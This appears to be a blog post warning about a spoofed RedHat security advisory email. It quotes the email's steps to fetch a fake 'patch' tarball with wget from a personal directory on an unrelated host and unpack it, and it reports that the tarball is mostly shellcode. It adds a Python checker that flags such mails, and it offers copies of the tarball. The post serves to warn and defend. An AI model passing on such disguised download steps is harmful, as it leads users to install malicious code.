I just got a nice RedHat security advisory email spoof, subject: “RedHat: Buffer Overflow in "ls" and "mkdir"”.
The content was text/html, but the thing that really gave it away, before I started looking in the headers, was this part:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
Thank you very much…
Anyone following these directions deserves what they get. I took a quick look at the code in the inst.c file, which is in the fileutils-1.0.6.patch.tar.gz tarball, and it's mostly shellcode as expected. I have no idea what it does, but it's probably not benign.
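The two tells described above (an HTML body, and a "patch" fetched with wget from a personal ~user directory on a host that is not the vendor's) can be checked mechanically on incoming advisory mail. The following is an added example, not part of the original post; the trusted-domain list, the sender address and the finding names are assumptions, and the sample message is constructed around the lines quoted above.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# Assumption: domains the vendor really publishes from; adjust per vendor.
TRUSTED_SUFFIXES = ("redhat.com",)
# A wget/curl command, optional flags, then something that looks like a host/URL.
FETCH_RE = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+\.\S+)")

# Constructed sample: subject and commands are the ones quoted in the post,
# the sender address and HTML wrapper are made up.
SAMPLE = (
    "From: security@example.invalid\n"
    'Subject: RedHat: Buffer Overflow in "ls" and "mkdir"\n'
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=us-ascii\n"
    "\n"
    "<html><body><ul>\n"
    "<li>First download the patch from the Stanford RedHat mirror: "
    "wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</li>\n"
    "<li>Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz</li>\n"
    "</ul></body></html>\n"
)


def check_advisory(raw):
    """Return a list of findings for one raw RFC 822 message."""
    msg = message_from_string(raw)
    findings, bodies = [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype == "text/html":
            findings.append("html-body")
        if ctype.startswith("text/"):
            charset = part.get_content_charset() or "utf-8"
            payload = part.get_payload(decode=True) or b""
            bodies.append(payload.decode(charset, "replace"))
    text = re.sub(r"<[^>]+>", " ", "\n".join(bodies))  # crude tag strip
    for target in FETCH_RE.findall(text):
        url = urlparse(target if "://" in target else "http://" + target)
        host = (url.hostname or "").lower()
        if not any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES):
            findings.append("untrusted-download-host:" + host)
        if re.search(r"/~[^/]+/", url.path):
            findings.append("personal-directory-url")
    return findings
```

Findings are hints for triage, not a verdict: a message with none of them can still be forged, so the headers still need the look mentioned above.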
fileutils-1.0.6.patch.tar.gz and the original email
if you want copies, just mail